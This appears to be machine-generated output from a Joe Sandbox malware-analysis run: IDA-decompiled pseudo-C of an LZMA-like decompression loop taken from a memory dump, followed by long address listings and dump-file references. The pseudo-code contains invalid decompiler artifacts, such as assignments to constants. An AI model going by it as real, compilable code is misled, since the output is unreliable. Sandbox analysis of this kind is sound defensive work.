                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L148;
                                                												} else {
                                                													goto L146;
                                                												}
                                                											case 0x19:
                                                												__eflags = __ebx - 4;
                                                												if(__ebx < 4) {
                                                													 *(__ebp - 0x2c) = __ebx;
                                                													L119:
                                                													_t393 = __ebp - 0x2c;
                                                													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                													__eflags =  *_t393;
                                                													L120:
                                                													__eax =  *(__ebp - 0x2c);
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                														goto L170;
                                                													}
                                                													__eflags = __eax -  *(__ebp - 0x60);
                                                													if(__eax >  *(__ebp - 0x60)) {
                                                														goto L171;
                                                													}
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                													__eax =  *(__ebp - 0x30);
                                                													_t400 = __ebp - 0x60;
                                                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                													__eflags =  *_t400;
                                                													goto L123;
                                                												}
                                                												__ecx = __ebx;
                                                												__eax = __ebx;
                                                												__ecx = __ebx >> 1;
                                                												__eax = __ebx & 0x00000001;
                                                												__ecx = (__ebx >> 1) - 1;
                                                												__al = __al | 0x00000002;
                                                												__eax = (__ebx & 0x00000001) << __cl;
                                                												__eflags = __ebx - 0xe;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												if(__ebx >= 0xe) {
                                                													__ebx = 0;
                                                													 *(__ebp - 0x48) = __ecx;
                                                													L102:
                                                													__eflags =  *(__ebp - 0x48);
                                                													if( *(__ebp - 0x48) <= 0) {
                                                														__eax = __eax + __ebx;
                                                														 *(__ebp - 0x40) = 4;
                                                														 *(__ebp - 0x2c) = __eax;
                                                														__eax =  *(__ebp - 4);
                                                														__eax =  *(__ebp - 4) + 0x644;
                                                														__eflags = __eax;
                                                														L108:
                                                														__ebx = 0;
                                                														 *(__ebp - 0x58) = __eax;
                                                														 *(__ebp - 0x50) = 1;
                                                														 *(__ebp - 0x44) = 0;
                                                														 *(__ebp - 0x48) = 0;
                                                														L112:
                                                														__eax =  *(__ebp - 0x40);
                                                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                															_t391 = __ebp - 0x2c;
                                                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                															__eflags =  *_t391;
                                                															goto L119;
                                                														}
                                                														__eax =  *(__ebp - 0x50);
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                														__eax =  *(__ebp - 0x58);
                                                														__esi = __edi + __eax;
                                                														 *(__ebp - 0x54) = __esi;
                                                														__ax =  *__esi;
                                                														__ecx = __ax & 0x0000ffff;
                                                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                														__eflags =  *(__ebp - 0xc) - __edx;
                                                														if( *(__ebp - 0xc) >= __edx) {
                                                															__ecx = 0;
                                                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                															__ecx = 1;
                                                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                															__ebx = 1;
                                                															__ecx =  *(__ebp - 0x48);
                                                															__ebx = 1 << __cl;
                                                															__ecx = 1 << __cl;
                                                															__ebx =  *(__ebp - 0x44);
                                                															__ebx =  *(__ebp - 0x44) | __ecx;
                                                															__cx = __ax;
                                                															__cx = __ax >> 5;
                                                															__eax = __eax - __ecx;
                                                															__edi = __edi + 1;
                                                															__eflags = __edi;
                                                															 *(__ebp - 0x44) = __ebx;
                                                															 *__esi = __ax;
                                                															 *(__ebp - 0x50) = __edi;
                                                														} else {
                                                															 *(__ebp - 0x10) = __edx;
                                                															0x800 = 0x800 - __ecx;
                                                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                															 *__esi = __dx;
                                                														}
                                                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                														if( *(__ebp - 0x10) >= 0x1000000) {
                                                															L111:
                                                															_t368 = __ebp - 0x48;
                                                															 *_t368 =  *(__ebp - 0x48) + 1;
                                                															__eflags =  *_t368;
                                                															goto L112;
                                                														} else {
                                                															goto L109;
                                                														}
                                                													}
                                                													__ecx =  *(__ebp - 0xc);
                                                													__ebx = __ebx + __ebx;
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                														__ecx =  *(__ebp - 0x10);
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                														__ebx = __ebx | 0x00000001;
                                                														__eflags = __ebx;
                                                														 *(__ebp - 0x44) = __ebx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L101:
                                                														_t338 = __ebp - 0x48;
                                                														 *_t338 =  *(__ebp - 0x48) - 1;
                                                														__eflags =  *_t338;
                                                														goto L102;
                                                													} else {
                                                														goto L99;
                                                													}
                                                												}
                                                												__edx =  *(__ebp - 4);
                                                												__eax = __eax - __ebx;
                                                												 *(__ebp - 0x40) = __ecx;
                                                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                												goto L108;
                                                											case 0x1a:
                                                												L56:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1a;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x68);
                                                												__al =  *(__ebp - 0x5c);
                                                												__edx =  *(__ebp - 8);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *( *(__ebp - 0x68)) = __al;
                                                												__ecx =  *(__ebp - 0x14);
                                                												 *(__ecx +  *(__ebp - 8)) = __al;
                                                												__eax = __ecx + 1;
                                                												__edx = 0;
                                                												_t192 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t192;
                                                												goto L80;
                                                											case 0x1b:
                                                												L76:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1b;
                                                													goto L170;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t275 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t275;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												_t284 = __ebp - 0x64;
                                                												 *_t284 =  *(__ebp - 0x64) - 1;
                                                												__eflags =  *_t284;
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												L80:
                                                												 *(__ebp - 0x14) = __edx;
                                                												goto L81;
                                                											case 0x1c:
                                                												while(1) {
                                                													L123:
                                                													__eflags =  *(__ebp - 0x64);
                                                													if( *(__ebp - 0x64) == 0) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__edx =  *(__ebp - 8);
                                                													__cl =  *(__eax + __edx);
                                                													__eax =  *(__ebp - 0x14);
                                                													 *(__ebp - 0x5c) = __cl;
                                                													 *(__eax + __edx) = __cl;
                                                													__eax = __eax + 1;
                                                													__edx = 0;
                                                													_t414 = __eax %  *(__ebp - 0x74);
                                                													__eax = __eax /  *(__ebp - 0x74);
                                                													__edx = _t414;
                                                													__eax =  *(__ebp - 0x68);
                                                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                													__eflags =  *(__ebp - 0x30);
                                                													 *( *(__ebp - 0x68)) = __cl;
                                                													 *(__ebp - 0x14) = _t414;
                                                													if( *(__ebp - 0x30) > 0) {
                                                														continue;
                                                													} else {
                                                														L81:
                                                														 *(__ebp - 0x88) = 2;
                                                														goto L1;
                                                													}
                                                												}
                                                												 *(__ebp - 0x88) = 0x1c;
                                                												goto L170;
                                                										}
                                                									}
                                                									L171:
                                                									_t535 = _t534 | 0xffffffff;
                                                									goto L172;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}













                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca8
                                                0x00406cb2
                                                0x00000000
                                                0x00406c9d
                                                0x00406c9d
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ceb
                                                0x00406cf0
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00406f49
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00407160
                                                0x00407168
                                                0x0040716f
                                                0x00407171
                                                0x00407178
                                                0x0040717c
                                                0x0040717c
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb9
                                                0x00406fbc
                                                0x00406fbc
                                                0x00406fc2
                                                0x00406fc2
                                                0x0040675e
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00000000
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d7
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068da
                                                0x004068dc
                                                0x004068df
                                                0x00406950
                                                0x00406953
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x004068e1
                                                0x004068e5
                                                0x004068e8
                                                0x004068ea
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406902
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x00406917
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x00406927
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00000000
                                                0x0040692c
                                                0x0040692c
                                                0x0040692f
                                                0x00406932
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x00000000
                                                0x00406943
                                                0x00000000
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406ba8
                                                0x00406bab
                                                0x00406bae
                                                0x00406bb1
                                                0x00406bb4
                                                0x00406bb6
                                                0x00406bbd
                                                0x00406bbe
                                                0x00406bc0
                                                0x00406bc3
                                                0x00406bc6
                                                0x00406bc9
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406bce
                                                0x00406b7f
                                                0x00406b82
                                                0x00406b85
                                                0x00406b8f
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00000000
                                                0x00406be3
                                                0x00406be7
                                                0x00406c0a
                                                0x00406c0d
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406be9
                                                0x00406bec
                                                0x00406bef
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406c02
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00000000
                                                0x00406c26
                                                0x00406c2a
                                                0x00000000
                                                0x00000000
                                                0x00406c30
                                                0x00406c34
                                                0x00000000
                                                0x00000000
                                                0x00406c3a
                                                0x00406c3c
                                                0x00406c40
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00406973
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00000000
                                                0x004070e4
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00406998
                                                0x00406998
                                                0x0040699b
                                                0x0040699e
                                                0x00000000
                                                0x00000000
                                                0x004069a4
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069db
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a0e
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a17
                                                0x00406a1e
                                                0x00406a21
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a2c
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a51
                                                0x00406a51
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a74
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406a9f
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aa4
                                                0x00406aab
                                                0x00406aae
                                                0x00000000
                                                0x00406ab0
                                                0x00000000
                                                0x00406ab0
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00000000
                                                0x00000000
                                                0x00406af0
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00406b15
                                                0x00406b15
                                                0x00406b1b
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00000000
                                                0x00406abc
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b38
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b63
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b68
                                                0x00406b6f
                                                0x00406b72
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f10
                                                0x00406f14
                                                0x00406f36
                                                0x00406f39
                                                0x00406f43
                                                0x00406f46
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f46
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f20
                                                0x00406f23
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00407004
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00406fc2
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00407042
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00406fc8
                                                0x00406fc2
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407066
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x00407098
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x00406f09
                                                0x0040713e
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00407175
                                                0x00407175
                                                0x00000000
                                                0x00407175
                                                0x00406fc2
                                                0x00406f49
                                                0x00406f46
                                                0x00000000
                                                0x00406c9b

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
